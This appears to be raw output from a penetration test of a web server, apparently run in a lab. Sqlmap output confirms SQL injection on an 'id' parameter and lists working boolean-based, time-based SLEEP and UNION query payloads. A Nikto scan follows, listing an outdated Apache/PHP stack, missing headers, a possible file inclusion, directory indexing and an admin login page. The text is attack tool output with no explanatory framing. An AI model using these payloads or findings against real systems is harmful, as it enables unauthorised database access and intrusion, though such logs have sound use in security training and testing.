sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 7510=7510
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 5982 FROM (SELECT(SLEEP(5)))lOqF)
Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=-9410 UNION ALL SELECT NULL,NULL,CONCAT(0x7171706a71,0x716c664c74636976635573484b575956527471614e56527a524b527a4a76687a4a78454267716675,0x7171787871),NULL-- - ---
- Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: + Target Hostname: + Target Port: 80 + Start Time: 2021-03-12 20:47:51 (GMT-5) --------------------------------------------------------------------------- + Server: Apache/2.2.16 (Debian) + Retrieved x-powered-by header: PHP/5.3.2 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "". + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /index.php: PHP include error may indicate local or remote file inclusion is possible. + OSVDB-3126: /submit?setoption=q&option=allowed_ips&value= MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080. + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3268: /css/: Directory indexing found. + OSVDB-3092: /css/: This might be interesting... + OSVDB-3092: /login/: This might be interesting... + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3268: /images/: Directory indexing found. + Server may leak inodes via ETags, header found with file /icons/README, inode: 3472, size: 5108, mtime: Tue Aug 28 06:48:10 2007 + OSVDB-3233: /icons/README: Apache default file found. + /login.php: Admin login page/section found. + 8725 requests: 0 error(s) and 23 item(s) reported on remote host + End Time: 2021-03-12 20:48:20 (GMT-5) (29 seconds)